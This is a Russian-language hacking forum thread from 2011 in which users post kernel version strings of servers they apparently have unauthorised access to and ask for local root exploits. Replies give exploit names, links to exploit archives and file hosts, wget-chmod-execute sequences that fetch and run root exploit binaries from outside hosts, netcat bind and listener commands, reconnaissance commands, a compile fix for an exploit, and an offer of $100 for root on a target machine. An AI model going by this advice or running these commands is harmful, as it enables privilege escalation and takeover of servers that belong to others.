PDA

Просмотр полной версии : повышение прав [задай вопрос - получи ответ]


Страницы : 1 [2] 3

admink1
18.04.2011, 20:07
есть скомпилированный сплоит для xp sp2 ?

vasykas
18.04.2011, 20:23
есть скомпилированный сплоит для xp sp2 ?


metasploit???? нет?

vasykas
19.04.2011, 10:38
C:\nc>nc.exe -l -v -n -p 5555
listening on [any] 5555 ...
connect to [1ip] from (UNKNOWN) [2ip] 49183

C:\nc>nc.exe -l -v -n -p 11457
listening on [any] 11457 ...
connect to [1ip] from (UNKNOWN) [2ip] 43520

C:\nc>nc.exe -l -v -n -p 11457
listening on [any] 11457 ...
connect to [1ip] from (UNKNOWN) [2ip] 43521

C:\nc>nc.exe -l -v -n -p 4646
listening on [any] 4646 ...
connect to [1ip] from (UNKNOWN) [2ip] 41248

C:\nc>

И че блин делать?


попробуй бинд

nc.exe xxx.xxx.xxx.xxx 13337

vasykas
19.04.2011, 10:50
Linux 2.6.23.17-88.fc7 #1 SMP Thu May 15 00:35:10 EDT 2008 i686 i686 i386 GNU/Linux
стукните плиз у кого есть!


может это

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464953

Expl0ited
19.04.2011, 18:09
я думаю чтобы не было споров надо почитать:
http://www.freebsd.org/doc/ru_RU.KOI8-R/articles/explaining-bsd/compairing-bsd-and-linux.html


А причем здесь отличия систем, и то как можно закрепится?

vasykas
19.04.2011, 18:12
А причем здесь отличия систем, и то как можно закрепится?


сори не до конца понял тему

BigBear
19.04.2011, 21:06
inux ds210.reliablehosting.com 2.6.18-164.11.1.el5PAE #1 SMP Wed Jan 20 08:16:13 EST 2010 i686

Вот под это что нибудь есть ?

Заранее благодарен.

aydar
23.04.2011, 17:35
а есть чтонибудь на

Linux сайт 2.6.26-2-amd64 #1 SMP Tue Jan 12 22:12:20 UTC 2010 x86_64

Tigger
25.04.2011, 23:44
Linux 2.6.26-2-xen-amd64 #1 SMP Wed Mar 10 00:29:48 UTC 2010 x86_64 GNU/Linux

robert_you_suck.c \ full_nelson.c \ sendpage3 не сработали... Будут предложения?

rootmd
26.04.2011, 01:24
Linux 2.6.26-2-xen-amd64 #1 SMP Wed Mar 10 00:29:48 UTC 2010 x86_64 GNU/Linux
robert_you_suck.c \ full_nelson.c не сработали... Будут предложения?


sendpage3

Tigger
26.04.2011, 03:11
sendpage3


Пробовал, не сработал, забыл указать просто...

A_n_d_r_e_i
27.04.2011, 22:27
Linux 2.6.18-194.32.1.el5 #1 SMP Wed Jan 5 17:53:09 EST 2011 i686

Есть что под это?

cashm
28.04.2011, 23:12
какой сплоит использовать??

uname -a: Linux server.webmph.com 2.6.18-028stab068.3-ent #1 SMP Wed Feb 17 11:54:49 MSK 2010 i686

eclipse
29.04.2011, 10:44
Нужен сплойт для рута FreeBSD 8.2, если у кого есть - поделитесь плз!

vasykas
29.04.2011, 13:03
Нужен сплойт для рута FreeBSD 8.2, если у кого есть - поделитесь плз!


Эти не помогут:

http://packetstormsecurity.org/search/files/?q=freebsd%20root%20exploit



http://www.hackerzlair.org/members/blank/pROcon/information.htm

cashm
29.04.2011, 17:58
eshe na eti est chto????

uname -a: Linux 2.6.18-194.17.1.el5 #1 SMP Wed Sep 29 12:50:31 EDT 2010

uname -a: Linux 2.6.18-028stab068.3-ent #1 SMP Wed Feb 17 11:54:49 MSK 2010 i686

Linux n16 2.6.33.1mtv4 #1 SMP Fri Apr 8 10:06:50 PDT 2011 i686

Agnesti
02.05.2011, 20:58
Linux *** 2.6.18-194.17.1.el5 #1 SMP Wed Sep 29 12:50:31 EDT 2010 x86_64

Linux *** 2.6.18-238.9.1.el5xen #1 SMP Tue Apr 12 19:32:47 EDT 2011 i686

Под это есть что нибуть?

FlaktW
03.05.2011, 21:28
Darwin Kernel Version 9.8.0: Wed Jul 15 16:55:01 PDT 2009; root:xnu-1228.15.4~1/RELEASE_I386 i386

ubi
04.05.2011, 12:03
Linux inventory 2.6.24-28-virtual #1 SMP Wed Nov 24 10:38:58 UTC 2010 i686

SEWERN
04.05.2011, 21:43
2.6.18-194.32.1.el5PAE #1 SMP Wed Jan 5 18:43:13 EST 2011 i686

Знаю что вышел локал рут (версия 2011 года), но не могу найти - если есть у кого то то помогите плз! Если есть у кого то акк тут _http://www.dl4hack.com/forum/local-root-exploits/1349-2-6-18-2011-root-exploit.html выложите плз сплойт

Cybersteger
05.05.2011, 20:24
2.6.18-194.32.1.el5PAE #1 SMP Wed Jan 5 18:43:13 EST 2011 i686
Знаю что вышел локал рут (версия 2011 года), но не могу найти - если есть у кого то то помогите плз! Если есть у кого то акк тут _http://www.dl4hack.com/forum/local-root-exploits/1349-2-6-18-2011-root-exploit.html выложите плз сплойт



мне кажется что этот(http://www.dl4hack.com/forum/local-root-exploits/1349-2-6-18-2011-root-exploit.html) сплойт vmsplice под 2008 (

http://security-tr.blogspot.com/2011/01/2618-2011-local-root-exploit.html)

можешь попробовать

https: / /rdot.org/forum/showthread.php?t=817 под Glibc

vasykas
07.05.2011, 02:43
Вообщем не очень понимаю в кодинге НО я тут прочитал

в журнале XАкере февраль 2011 есть "Обход ограничений БЕЗОПАСТНОСТИ в ядре LINUX и в ( обход защиты выделения памяти ниже значения ,установленного в mmap_min_addr. уязвимость "Разыменование нулевого указателя")

кто нибудь сможет пояснить что нужно исправить в сплоите 2010 ( так понял что там (изменение адреса памяти, этой ветки. а можно ли на другую ветку изменить адрес . mmap )

ReV0LVeR
08.05.2011, 07:14
OS: Linux u-host.ru 2.6.9-100.ELsmp


Server security information

Server software:Apache/2.0.52(Red Hat)

Loaded Apache modules:core,prefork,http_core,mod _so,mod_access,mod_auth,mod_auth_anon,mod_auth_dig est,mod_include,mod_log_config,mod_env,mod_expires ,mod_deflate,mod_headers,mod_usertrack,mod_setenvi f,mod_mime,mod_dav,mod_status,mod_autoindex,mod_in fo,mod_dav_fs,mod_vhost_alias,mod_negotiation,mod_ dir,mod_actions,mod_userdir,mod_alias,mod_rewrite, mod_cache,mod_suexec,mod_disk_cache,mod_file_cache ,mod_mem_cache,mod_cgi,mod_fpcgid,mod_jk,mod_bw,mo d_fcgid,mod_perl,mod_php5,mod_ssl

Disabled PHP Functions:ini_restore

Open base dir: /var/virtual/www/

cURL support:enabled

Supported databases:MySql(4.1.22),PostgreSQL



Спасибо

sevenup
08.05.2011, 15:09
OS: Linux u-host.ru 2.6.9-100.ELsmp

Server security information

Server software:Apache/2.0.52(Red Hat)

Loaded Apache modules:core,prefork,http_core,mod _so,mod_access,mod_auth,mod_auth_anon,mod_auth_dig est,mod_include,mod_log_config,mod_env,mod_expires ,mod_deflate,mod_headers,mod_usertrack,mod_setenvi f,mod_mime,mod_dav,mod_status,mod_autoindex,mod_in fo,mod_dav_fs,mod_vhost_alias,mod_negotiation,mod_ dir,mod_actions,mod_userdir,mod_alias,mod_rewrite, mod_cache,mod_suexec,mod_disk_cache,mod_file_cache ,mod_mem_cache,mod_cgi,mod_fpcgid,mod_jk,mod_bw,mo d_fcgid,mod_perl,mod_php5,mod_ssl

Disabled PHP Functions:ini_restore

Open base dir: /var/virtual/www/

cURL support:enabled

Supported databases:MySql(4.1.22),PostgreSQL



Спасибо


для Linux 2.6.9 вот:


1. wget http://www.grsecurity.net/~spender/enlightenment.tgz
2. tar -zxf enlightenment.tgz
3. cd enlightenment
4. ./run_null_exploits
5. ???
6. PROFIT!!!

guezd
10.05.2011, 16:02
Linux version 2.6.24-1gb-1 ?

Tigger
10.05.2011, 16:09
Linux version 2.6.24-1gb-1 ?


Кидайте вы полный uname -a, без даты сборки ядра нет смысла постить 100500 плоентов.

guezd
10.05.2011, 16:42
Linux version 2.6.24-1gb-1 (root@l4.in-so[TR@$H]lve.ru) (gcc version 4.1.2 (Gentoo 4.1.2 p1.0.2)) #4 SMP Fri Feb 29 20:10:01 MSK 2008

Tigger
10.05.2011, 16:56
Пробуй sock_sendpage 3: http://www.exploit-db.com/exploits/9641/

full_neslon

Так же есть посмотри в сторону Glibc.

M@rtein
11.05.2011, 15:58
что посоветуете на:

2.4.21-57.ELsmp #1 SMP Wed Apr 23 01:38:02 EDT 2008 i686 ?

plaeer
11.05.2011, 16:49
Linux *** 2.6.18-238.1.1.1.el5 #1 SMP Mon Jan 24 10:43:48 NOVT 2011 x86_64

???

Tigger
11.05.2011, 20:23
Linux *** 2.6.18-238.1.1.1.el5 #1 SMP Mon Jan 24 10:43:48 NOVT 2011 x86_64
???


Дата сборки ядра 2011 год, 99.99% что не порутаешь.

skM
11.05.2011, 20:26
2.6.35.4-grsec-hostnoc-4.3.0-x86_64-libata #1 SMP Mon Sep 20 19:13:02 EDT 2010 x86_64


есть что-нибудь ?

plaeer
11.05.2011, 20:27
Дата сборки ядра 2011 год, 99.99% что не порутаешь.


Я не порутаю или вообще никто?

Tigger
11.05.2011, 20:37
Я не порутаю или вообще никто?


Приватные сплоиты может и есть, в паблике 2011 нету.

Пересборка ядра в 99.99% озночает фикс предыдущих уязвимостей.

hide
12.05.2011, 23:45
Linux xx.ru 2.6.18-028stab056-aufs-teak21 #11 SMP Wed Mar 10 18:10:04 MSK 2010 i686

есть что нибудь?

skM
14.05.2011, 19:56
Linux xx.ru 2.6.18-028stab056-aufs-teak21 #11 SMP Wed Mar 10 18:10:04 MSK 2010 i686

есть что нибудь?


попробуй http://www.opennet.ru/opennews/art.shtml?num=28338

IMMORTAL_S
14.05.2011, 22:08
Linux 2.6.18-164.2.1.el5.028stab066.10 #1 SMP Sat Dec 12 18:52:53 MSK 2009 x86_64 GNU/Linux

Что-то не получилось этим http://www.1337day.com/exploits/14333

А в этом http://www.1337day.com/exploits/15065 нужно что-то подправить, но я не шарю *r34d th3 c0d3 m0r0n!

Help

add:

http://www.1337day.com/exploits/8208

Вот этот выдает ошибку

In function 'main':

error: 'PAGE_SIZE' undeclared (firs use in this function)

error: (Each undeclared identifier is reported only once for each function it appears in.)

Просто си для меня что-то невообразимое)) ..помогите

IMMORTAL_S
15.05.2011, 17:01
#include


Это есть... ругается вот на это:

pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};

Проблема решена.. добавил #define PAGE_SIZE getpagesize()

Жаль сплойт не сработал

M@rtein
18.05.2011, 17:03
Такой подскажите чем рутать?

2.6.18-194.17.1.el5 #1 SMP Wed Sep 29 12:50:31 EDT 2010 x86_64

А сплоит kernel-2.6.18.194 */*e15 */* 2010 Local Root Exploit - тлоько под x64 что ли?

plaeer
19.05.2011, 01:41
Как на счёт этого - Linux *** 2.6.18-194.8.1.el5.028stab070.4 #1 SMP Tue Aug 17 19:11:52 MSD 2010 x86_64 ???

skM
19.05.2011, 17:00
FreeBSD 4.10-RELEASE-p14 #0: Sa i386

ubi
19.05.2011, 19:38
Стесняюсь спросить

Linux inventory 2.6.32-31-generic-pae #61-Ubuntu SMP Fri Apr 8 20:00:13 UTC 2011 i686

wtarantul
20.05.2011, 02:40
Уважаемые. С этим получится, что сделать ?

Linux 2.6.9-89.0.25.ELsmp #1 SMP Thu May 6 12:28:03 EDT 2010 i686

vasykas
20.05.2011, 06:52
Уважаемые. С этим получится, что сделать ?
Linux 2.6.9-89.0.25.ELsmp #1 SMP Thu May 6 12:28:03 EDT 2010 i686


попробуй эти:

http://pastebin.com/tPF2w9VT

http://www.qurizhao.com/Article/HTML/20100901140434.html

попугай
25.05.2011, 14:24
2.6.18-194.11.4.el5 #1 SMP Tue Sep 21 05:04:09 EDT 2010 x86_64

Реально рутануть?

$n@ke
25.05.2011, 14:33
194 - скорее нет,чем да(

попугай
25.05.2011, 14:48
А что, собственно, означают эти цифры? 194.11.4.el5

hide
27.05.2011, 22:58
Linux www 2.6.34-gentoo-r12 #1 SMP Sun Oct 24 04:38:49 YEKST 2010 x86_64

есть что нибудь?

mc900
28.05.2011, 13:39
Парни кто может рутать за денежку или на взаимовыгодных условиях, стукните плз в ПМ мне. Желательно человек с хорошим набором сплойтов и с приватом.

vasykas
28.05.2011, 17:33
Linux www 2.6.34-gentoo-r12 #1 SMP Sun Oct 24 04:38:49 YEKST 2010 x86_64
есть что нибудь?


http://www.securitylab.ru/poc/extra/403996.php

правда на х86

http://www.exploit-db.com/exploits/12130/

еще можно full-nelson попробовать

ubi
30.05.2011, 12:44
Linux 2.6.35.8-nx #1 SMP Wed Nov 3 01:47:21 EDT 2010 i686

wkar
30.05.2011, 19:45
Linux 2.6.18-92.1.22.el5PAE #1 SMP Tue Dec 16 12:36:25 EST 2008 i686

enlightenment не взял

neuz
03.06.2011, 02:50
2.6.18-194.26.1.el5PAE #1 SMP Tue Nov 9 13:34:42 EST 2010 i686 i686 i386 GNU/Linux подскажите каким сплоитом поднять права

sevenup
03.06.2011, 16:33
2.6.18-194.26.1.el5PAE #1 SMP Tue Nov 9 13:34:42 EST 2010 i686 i686 i386 GNU/Linux подскажите каким сплоитом поднять права


Никаким...это ядро рутается только на x64 системе...

antiaudomain
03.06.2011, 16:43
2.6.21.7-2.fc8xen #1 SMP Fri Feb 15 12:39:36 EST 2008 i686

подскажете чего?

antiaudomain
03.06.2011, 20:49
телки!


не катит чего-то, к сожалению =\

Cennarios
06.06.2011, 16:30
Если не затруднит, пожалуйста под вот это дело что посоветуете:

Linux ps29317 2.6.33.7-vs2.3.0.36.30.4 x86_64

vasykas
06.06.2011, 19:02
Если не затруднит, пожалуйста под вот это дело что посоветуете:
Linux ps29317 2.6.33.7-vs2.3.0.36.30.4 x86_64


id пож. дата:

vasykas
06.06.2011, 19:06
Если не затруднит, пожалуйста под вот это дело что посоветуете:
Linux ps29317 2.6.33.7-vs2.3.0.36.30.4 x86_64


Если старая ветка то попробуй:

http://www.exploit-db.com/exploits/12130/

http://forum.xaknet.ru/showthread.php?t=19237

http://seclists.org/fulldisclosure/2009/Nov/105

jangle
07.06.2011, 12:54
uname -a:

Linux 2.6.35.11-83.9.amzn1.i686 #1 SMP Sat Feb 19 23:41:56 UTC 2011 i686

посоветуйте пожалуйста, что можно использовать для повышения прав. Плзб если можно, линки на сплойты

Заранее благодарен

TARANTYL
08.06.2011, 01:13
Ребята, будьте любезны помогите под это сокровище что-нибудь найти:

FreeBSD 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Tue Dec 8 10:36:29 IRKT 2009 root@freebsd8-amd64.

winstrool
08.06.2011, 01:26
помогите подобрать сплоит вод под это:


Linux web-server 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686


пробывал следущие сплоиты, не помогают:


2.6.18-128
2.6.18-128-private
2.6.18.194-kompilayr


это те что фигурировали постом выше...

sevenup
08.06.2011, 01:41
Ребята, будьте любезны помогите под это сокровище что-нибудь найти:
FreeBSD 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Tue Dec 8 10:36:29 IRKT 2009 root@freebsd8-amd64.


Этот точно пробьёт:

http://www.1337day.com/exploits/14374

sevenup
08.06.2011, 01:49
помогите подобрать сплоит вод под это:
пробывал следущие сплоиты, не помогают:
это те что фигурировали постом выше...



http://e-moneybook.com/ioncube/file/hack/kernel/2.6.18-2007

Если не возьмёт то попробуй этот:

http://e-moneybook.com/ioncube/file/hack/kernel/2.6.18-2008

sevenup
08.06.2011, 01:52
uname -a:
Linux 2.6.35.11-83.9.amzn1.i686 #1 SMP Sat Feb 19 23:41:56 UTC 2011 i686
посоветуйте пожалуйста, что можно использовать для повышения прав. Плзб если можно, линки на сплойты
Заранее благодарен


ничего...для 2011 года в паблике нету сплойтов.

jangle
08.06.2011, 15:07
uname -a:
Linux 2.6.35.11-83.9.amzn1.i686 #1 SMP Sat Feb 19 23:41:56 UTC 2011 i686
посоветуйте пожалуйста, что можно использовать для повышения прав. Плзб если можно, линки на сплойты
Заранее благодарен


Готов заплатить 100$ за предоставление root на этой машине.

ЗЫ "пробовать" не дам - надо конкретно - или да или нет. Есть 1 попытка! Далее все прикроют. Поэтому доверюсь только профи.

Все предложения строго в личку!!!

plaeer
12.06.2011, 13:53
Linux 2.6.18.8.xs5.5.0.13.442 #1 SMP Fri May 29 10:26:39 UTC 2009 i686

Что посоветуете?

vasykas
12.06.2011, 15:37
Linux 2.6.18.8.xs5.5.0.13.442 #1 SMP Fri May 29 10:26:39 UTC 2009 i686
Что посоветуете?


Этот должен подойти:

http://turboupload.com/hdjt80txiaxm

Nek1t
12.06.2011, 18:33
Linux 2.6.21.7-2.fc8xen


Какие идеи?

vasykas
12.06.2011, 18:45
Какие идеи?


выше ссылка

это autorooter

maxster
12.06.2011, 20:14
uname -a: Linux p13.alfaservers.com 2.6.9-89.0.20.ELsmp #1

кто может подсказать ?

beerbear
13.06.2011, 01:09
Linux univox 2.6.32.8-grsec-2.1.14-modsign-xeon-64 #2 SMP Sat Mar 13 00:42:43 PST 2010 x86_64

посоветуйте, плз, че-нить под это

Nek1t
13.06.2011, 02:00
выше ссылка
это autorooter


А сам пробовал этот авторутер? Так такой наборчик, что машина скорее упадет, чем порутается.

vasykas
13.06.2011, 11:31
А сам пробовал этот авторутер? Так такой наборчик, что машина скорее упадет, чем порутается.


и не один рутал

sevenup
13.06.2011, 11:42
Какие идеи?


wget http://trav1an.t35.com/Localz/Localz-4

chmod +x Localz-4

./Localz-4

sevenup
13.06.2011, 11:45
Linux univox 2.6.32.8-grsec-2.1.14-modsign-xeon-64 #2 SMP Sat Mar 13 00:42:43 PST 2010 x86_64
посоветуйте, плз, че-нить под это


http://www.exploit-db.com/exploits/15023/

Если не возьмёт, покажи вывод команды:


ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;

beerbear
13.06.2011, 14:52
http://www.exploit-db.com/exploits/15023/


пробовал его

не робит


Если не возьмёт, покажи вывод команды:

ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;



в личке

antiaudomain
14.06.2011, 17:59
Есть у кого скомпиленный babcia padlina под FreeBSD 6.1 2006 ? не компилится ни в какую у меня.. заранее благодарен

Escos
14.06.2011, 19:53
Linux 2.6.18-028stab077.1-ent #1 SMP Mon Nov 1 19:40:39 MSK 2010 i686

есть какие-нибудь варианты?

SpaceMan
14.06.2011, 22:26
ищу сплоит под Linux Kernel 2.6.9

sevenup
15.06.2011, 02:49
Linux 2.6.18-028stab077.1-ent #1 SMP Mon Nov 1 19:40:39 MSK 2010 i686
есть какие-нибудь варианты?


нету

sevenup
15.06.2011, 02:50
ищу сплоит под Linux Kernel 2.6.9


wget http://www.schoolbd.com/adsense/cc/2.6.9-55-2007-prv8

chmod +x 2.6.9-55-2007-prv8

./2.6.9-55-2007-prv8

SpaceMan
15.06.2011, 07:58
wget http://www.schoolbd.com/adsense/cc/2.6.9-55-2007-prv8
chmod +x 2.6.9-55-2007-prv8
./2.6.9-55-2007-prv8


неполучаеться (

http://s001.radikal.ru/i193/1106/80/87a1a863cddf.jpg

sevenup
15.06.2011, 12:25
неполучаеться (
http://s001.radikal.ru/i193/1106/80/87a1a863cddf.jpg


ты пытаешься скачать файл в папку в которой у тебя нету прав на запись...используй переводчик, если не знаешь англ.

AppS
15.06.2011, 12:43
SpaceMan


cd /tmp
wget http://www.schoolbd.com/adsense/cc/2.6.9-55-2007-prv8
chmod +x 2.6.9-55-2007-prv8
./2.6.9-55-2007-prv8

Unknown
22.06.2011, 12:09
Есть что нибудь под это?


5.1.37-1ubuntu5.5 работает на debian-lunux-gnu

Expl0ited
22.06.2011, 12:14
uname -a кинь

Unknown
22.06.2011, 12:29
Пишет Query was done!

попугай
23.06.2011, 00:55
2.6.18-1.2798.fc6 #1 SMP Mon Oct 16 14:54:20 EDT 2006 i686

Есть что-нибудь под это?

winstrool
23.06.2011, 03:52
попробуй вот из этого:

2.6.18-*

скомпелированый _http://zalil.ru/31319111

исходники _http://zalil.ru/31319116

sevenup
24.06.2011, 13:36
2.6.18-1.2798.fc6 #1 SMP Mon Oct 16 14:54:20 EDT 2006 i686
Есть что-нибудь под это?


wget http://www.interiordelduque.com/userfiles/image/2.6.18

chmod +x 2.6.18

./2.6.18

Vald
25.06.2011, 01:16
Linux hosting 2.6.26-1-686 #1 SMP Fri Mar 13 18:08:45 UTC 2009 i686

Под это есть что-то?

попугай
25.06.2011, 02:05
wget http://www.schoolbd.com/adsense/cc/2.6.9-55-2007-prv8
chmod +x 2.6.9-55-2007-prv8
./2.6.9-55-2007-prv8



sh: ./2.6.9-55-2007-prv8: cannot execute binary file

Мне бы 2.6.9-89.0.23.EL #1 Wed Mar 17 06:22:05 EDT 2010 i686 пробить.

sevenup
25.06.2011, 13:26
Linux hosting 2.6.26-1-686 #1 SMP Fri Mar 13 18:08:45 UTC 2009 i686
Под это есть что-то?



ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;

ответ сервера покажи


sh: ./2.6.9-55-2007-prv8: cannot execute binary file
Мне бы 2.6.9-89.0.23.EL #1 Wed Mar 17 06:22:05 EDT 2010 i686 пробить.


ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;

ответ сервера покажи

Vald
25.06.2011, 13:55
$ ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;

total 26948

3637249 drwxr-xr-x 3 root root 4096 Apr 8 2009 .

2 drwxr-xr-x 24 root root 4096 Apr 8 2009 ..

3637250 -rw-r--r-- 1 root root 723178 Feb 11 2008 System.map-2.6.18-6-686

3637268 -rw-r--r-- 1 root root 928033 Mar 14 2009 System.map-2.6.26-1-686

3637251 -rw-r--r-- 1 root root 70682 Feb 11 2008 config-2.6.18-6-686

3637269 -rw-r--r-- 1 root root 91640 Mar 14 2009 config-2.6.26-1-686

3637254 drwxr-xr-x 2 root root 4096 Apr 8 2009 grub

3637267 -rw-r--r-- 1 root root 5259149 Apr 8 2009 initrd.img-2.6.18-6-686

3637266 -rw-r--r-- 1 root root 5259970 Apr 8 2009 initrd.img-2.6.18-6-686.bak

3637272 -rw-r--r-- 1 root root 6194894 Apr 8 2009 initrd.img-2.6.26-1-686

3637270 -rw-r--r-- 1 root root 6194909 Apr 8 2009 initrd.img-2.6.26-1-686.bak

3637252 -rw-r--r-- 1 root root 1260861 Feb 11 2008 vmlinuz-2.6.18-6-686

3637253 -rw-r--r-- 1 root root 1506512 Mar 14 2009 vmlinuz-2.6.26-1-686

12697846 -rw-r--r-- 1 root root 5440 Jan 4 2009 /lib/libpcprofile.so

12697768 -rwxr-xr-x 1 root root 113248 Jan 4 2009 /lib/ld-2.7.so

12697649 lrwxrwxrwx 1 root root 9 Apr 8 2009 /lib/ld-linux.so.2 -> ld-2.7.so

попугай
25.06.2011, 18:22
ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;
ответ сервера покажи



total 55852

2 drwxr-xr-x 4 root root 8192 Mar 3 06:11 .

2 drwxr-xr-x 27 root root 4096 Jun 8 01:19 ..

6036 -rw-r--r-- 1 root root 770652 Feb 18 08:41 System.map-2.6.9-100.EL

14 -rw-r--r-- 1 root root 749462 Aug 12 2006 System.map-2.6.9-42.EL

18 -rw-r--r-- 1 root root 754505 Jun 26 2007 System.map-2.6.9-55.0.2.EL

6031 -rw-r--r-- 1 root root 754717 Sep 28 2007 System.map-2.6.9-55.0.9.EL

10042 -rw-r--r-- 1 root root 759989 Dec 19 2007 System.map-2.6.9-67.0.1.EL

10062 -rw-r--r-- 1 root root 760559 Jul 24 2008 System.map-2.6.9-67.0.22.EL

10047 -rw-r--r-- 1 root root 759989 Feb 3 2008 System.map-2.6.9-67.0.4.EL

10087 -rw-r--r-- 1 root root 780664 May 1 2009 System.map-2.6.9-78.0.22.EL

10077 -rw-r--r-- 1 root root 780400 Nov 20 2008 System.map-2.6.9-78.0.8.EL

2009 -rw-r--r-- 1 root root 768660 Nov 4 2009 System.map-2.6.9-89.0.16.EL

2019 -rw-r--r-- 1 root root 768688 Jan 8 2010 System.map-2.6.9-89.0.19.EL

2029 -rw-r--r-- 1 root root 768822 Mar 17 2010 System.map-2.6.9-89.0.23.EL

2034 -rw-r--r-- 1 root root 768853 May 6 2010 System.map-2.6.9-89.0.25.EL

2039 -rw-r--r-- 1 root root 768881 Aug 20 2010 System.map-2.6.9-89.0.28.EL

10097 -rw-r--r-- 1 root root 768504 Aug 24 2009 System.map-2.6.9-89.0.9.EL

2049 -rw-r--r-- 1 root root 768881 Sep 28 2010 System.map-2.6.9-89.29.1.EL

2054 -rw-r--r-- 1 root root 769059 Oct 20 2010 System.map-2.6.9-89.31.1.EL

2059 -rw-r--r-- 1 root root 769059 Dec 2 2010 System.map-2.6.9-89.33.1.EL

6027 -rw-r--r-- 1 root root 769061 Jan 19 01:06 System.map-2.6.9-89.35.1.EL

6025 -rwxr--r-- 1 root root 6144 Jul 30 2007 aquota.user

6037 -rw-r--r-- 1 root root 51676 Feb 18 08:41 config-2.6.9-100.EL

15 -rw-r--r-- 1 root root 50333 Aug 12 2006 config-2.6.9-42.EL

19 -rw-r--r-- 1 root root 50432 Jun 26 2007 config-2.6.9-55.0.2.EL

6032 -rw-r--r-- 1 root root 50432 Sep 28 2007 config-2.6.9-55.0.9.EL

10043 -rw-r--r-- 1 root root 50924 Dec 19 2007 config-2.6.9-67.0.1.EL

10063 -rw-r--r-- 1 root root 50925 Jul 24 2008 config-2.6.9-67.0.22.EL

10048 -rw-r--r-- 1 root root 50924 Feb 3 2008 config-2.6.9-67.0.4.EL

10088 -rw-r--r-- 1 root root 51502 May 1 2009 config-2.6.9-78.0.22.EL

10078 -rw-r--r-- 1 root root 51501 Nov 20 2008 config-2.6.9-78.0.8.EL

2010 -rw-r--r-- 1 root root 51614 Nov 4 2009 config-2.6.9-89.0.16.EL

2020 -rw-r--r-- 1 root root 51614 Jan 8 2010 config-2.6.9-89.0.19.EL

2030 -rw-r--r-- 1 root root 51614 Mar 17 2010 config-2.6.9-89.0.23.EL

2035 -rw-r--r-- 1 root root 51645 May 6 2010 config-2.6.9-89.0.25.EL

2040 -rw-r--r-- 1 root root 51645 Aug 20 2010 config-2.6.9-89.0.28.EL

18073 -rw-r--r-- 1 root root 51613 Aug 24 2009 config-2.6.9-89.0.9.EL

2050 -rw-r--r-- 1 root root 51645 Sep 28 2010 config-2.6.9-89.29.1.EL

2055 -rw-r--r-- 1 root root 51645 Oct 20 2010 config-2.6.9-89.31.1.EL

2060 -rw-r--r-- 1 root root 51645 Dec 2 2010 config-2.6.9-89.33.1.EL

6028 -rw-r--r-- 1 root root 51645 Jan 19 01:06 config-2.6.9-89.35.1.EL

12049 drwxr-xr-x 2 root root 1024 Mar 3 06:11 grub

6040 -rw-r--r-- 1 root root 593873 Mar 3 06:11 initrd-2.6.9-100.EL.img

17 -rw-r--r-- 1 root root 399475 Jul 28 2007 initrd-2.6.9-42.EL.img

21 -rw-r--r-- 1 root root 588215 Jul 28 2007 initrd-2.6.9-55.0.2.EL.img

6034 -rw-r--r-- 1 root root 588204 Sep 29 2007 initrd-2.6.9-55.0.9.EL.img

10046 -rw-r--r-- 1 root root 592220 Dec 22 2007 initrd-2.6.9-67.0.1.EL.img

10066 -rw-r--r-- 1 root root 592219 Jul 25 2008 initrd-2.6.9-67.0.22.EL.img

10051 -rw-r--r-- 1 root root 592222 Feb 5 2008 initrd-2.6.9-67.0.4.EL.img

10091 -rw-r--r-- 1 root root 592902 Jun 8 2009 initrd-2.6.9-78.0.22.EL.img

10081 -rw-r--r-- 1 root root 592859 Nov 21 2008 initrd-2.6.9-78.0.8.EL.img

2013 -rw-r--r-- 1 root root 593352 Nov 5 2009 initrd-2.6.9-89.0.16.EL.img

2023 -rw-r--r-- 1 root root 593344 Jan 10 2010 initrd-2.6.9-89.0.19.EL.img

2033 -rw-r--r-- 1 root root 593542 Mar 21 2010 initrd-2.6.9-89.0.23.EL.img

2038 -rw-r--r-- 1 root root 593530 May 9 2010 initrd-2.6.9-89.0.25.EL.img

2043 -rw-r--r-- 1 root root 593592 Aug 24 2010 initrd-2.6.9-89.0.28.EL.img

18076 -rw-r--r-- 1 root root 593358 Aug 26 2009 initrd-2.6.9-89.0.9.EL.img

2053 -rw-r--r-- 1 root root 593576 Sep 30 2010 initrd-2.6.9-89.29.1.EL.img

2058 -rw-r--r-- 1 root root 593565 Oct 21 2010 initrd-2.6.9-89.31.1.EL.img

2063 -rw-r--r-- 1 root root 593569 Jan 12 05:52 initrd-2.6.9-89.33.1.EL.img

6035 -rw-r--r-- 1 root root 593570 Jan 21 05:36 initrd-2.6.9-89.35.1.EL.img

11 drwx------ 2 root root 12288 Jul 28 2007 lost+found

12 -rw-r--r-- 1 root root 9371 Aug 13 2006 message

13 -rw-r--r-- 1 root root 9371 Aug 13 2006 message.ja

6026 -rwxr--r-- 1 root root 32 Jul 30 2007 quota.user

6038 -rw-r--r-- 1 root root 67797 Feb 18 08:41 symvers-2.6.9-100.EL.gz

10044 -rw-r--r-- 1 root root 64308 Dec 19 2007 symvers-2.6.9-67.0.1.EL.gz

10064 -rw-r--r-- 1 root root 64329 Jul 24 2008 symvers-2.6.9-67.0.22.EL.gz

10049 -rw-r--r-- 1 root root 64308 Feb 3 2008 symvers-2.6.9-67.0.4.EL.gz

10089 -rw-r--r-- 1 root root 66266 May 1 2009 symvers-2.6.9-78.0.22.EL.gz

10079 -rw-r--r-- 1 root root 66235 Nov 20 2008 symvers-2.6.9-78.0.8.EL.gz

2011 -rw-r--r-- 1 root root 67596 Nov 4 2009 symvers-2.6.9-89.0.16.EL.gz

2021 -rw-r--r-- 1 root root 67596 Jan 8 2010 symvers-2.6.9-89.0.19.EL.gz

2031 -rw-r--r-- 1 root root 67606 Mar 17 2010 symvers-2.6.9-89.0.23.EL.gz

2036 -rw-r--r-- 1 root root 67650 May 6 2010 symvers-2.6.9-89.0.25.EL.gz

